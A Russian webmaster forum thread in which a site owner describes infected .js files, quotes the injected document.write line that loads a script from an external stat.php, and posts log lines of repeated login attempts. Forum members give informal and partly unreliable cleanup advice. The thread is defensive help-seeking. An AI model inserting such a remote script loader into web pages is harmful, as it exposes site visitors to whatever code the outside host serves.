- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
1. Месяца 2 назад почистил свои самописные сайты (не на движках) от кода:
<!-- js-tools -->
document.write('<script src="http://sait.ru/i/stat.php"></script>');
<!-- /js-tools -->
Прописывается в некоторых *.js файлах этот код.
2. Поменял пароли FTP на хостинге, заменил в Тотал Команде 8.01 "Сменить главный пароль"
3. Поставил на файлы права доступа 644
Сегодня в Вебмастере снова значок "Поведенческий анализ", заражены скриптовые файлы.
Файлы испорченных скриптов стали 777
Помогите найти дыру, что сделать еще кроме смены паролей и прав на файлы?
Шелы залили вам,нужно сделать следующее,поставте не зараженную копию сайта и базу данных,смените пароли, запретите загрузку файлов по php и отключите не нужные расширения в php.Вообще у вас дыры в безопасности,лучше нанять человека по безопасности и хорошего админа на сервер.Если сами не умеете настраивать серверы наймите человека,могу дать координаты.
PS Это нужно сделать для всех сайтах которые стоят на одном сервере или хостинге,если сделать только 1 результата не будет.
запретите загрузку файлов по php и отключите не нужные расширения в php
Как реализовать?
Конкретнее, где бывают дыры для заливания шеллов, неужели ломают главный пароль в тотале?
Настраивается это в php.ini
Если у вас движок самописный,то скорее всего ломают сам сервер или хостинг,я точно не знаю как объяснить,через расширения типа exec и таких там куча.они может и не нужны вам для работы сайта но они включены и через них как то.А вообще могли уже скрытые доступы создать,вы их не видите а они есть,это то же надо проверять.Смотрите журнал операция который показывает все действия на сервере и смотрите что заливалось и правилось.
В журнале операции на хостинге нашел такие строки, которых сотни:
11.04.2014 23:46 nobody 82.146.59.139 auth
11.04.2014 23:46 nobody 82.146.59.139 auth
11.04.2014 23:45 nobody 82.146.59.139 auth
11.04.2014 23:44 nobody 82.146.59.139 auth
Получается, пытаются ко мне авторизоватся...
Проверил этот IP, зараженный адрес, Касперский ругается при заходе на сайт.
IP 82.146.59.139
Хост: sell-volkswagen.ru
Написал на хостинг обо всем подробно, ответили:
Ваш запрос передан в отдел "Abuse team". Вы получите ответ в рабочее время отдела, приблизительно через 1 день 23:50.
Возможно тогда у вас просто подбирают пароль,используйте спец символы таких случаях ! и #.
А вообще фаерфол у хостера должен автоматом блокировать такие запросы,он создает доп файл .htaccess который и блокирует такие запросы.
А вообще фаерфол у хостера должен автоматом блокировать такие запросы,он создает доп файл .htaccess который и блокирует такие запросы.
Хостера firstvds.ru еще и платную техподдержку сделали, где-то полгода назад.
Причем при проверке IP показало: abuse-mailbox: abuse@firstvds.ru
значит это у моего хостера зараза сидит, ппц.
То есть в правильном направлении я двигаюсь посмотрев журнал операций?
Наверное в правильном,я не спец по вирусам просто сталкивался сам ,что знаю сказал.А вообще че это за хостер с платной поддержкой,смените его да и все,да еще и отвечает только в рабочие дни вообще странно это все.Стремный он какой то.Пароли поменяйте пока со спец символами сделайте,подобрать больше не должны будут.
Вот такого вида пароли, думаю, их не реально подобрать:
4lI0ib7{<%9!+!N_!+75-
XT1k+D-5Zu!
Значит дело не в паролях ... а по поводу хостера полностью согласен, скоро закроем двери.
1. При чем тут "Любые вопросы от новичков по оптимизации"
2. Есть раздел "Безопасность"
3. Там есть тема прикрепленная, если напрячься и почитать - то можно найти кучу советов дельных
4. Сборище теоретиков тут насоветует вам сейчас.
У вас XSS уязвимость на одном из сайтов. Заливают шелку и получают доступ ко всем файлам ваших всех сайтов на этом акке.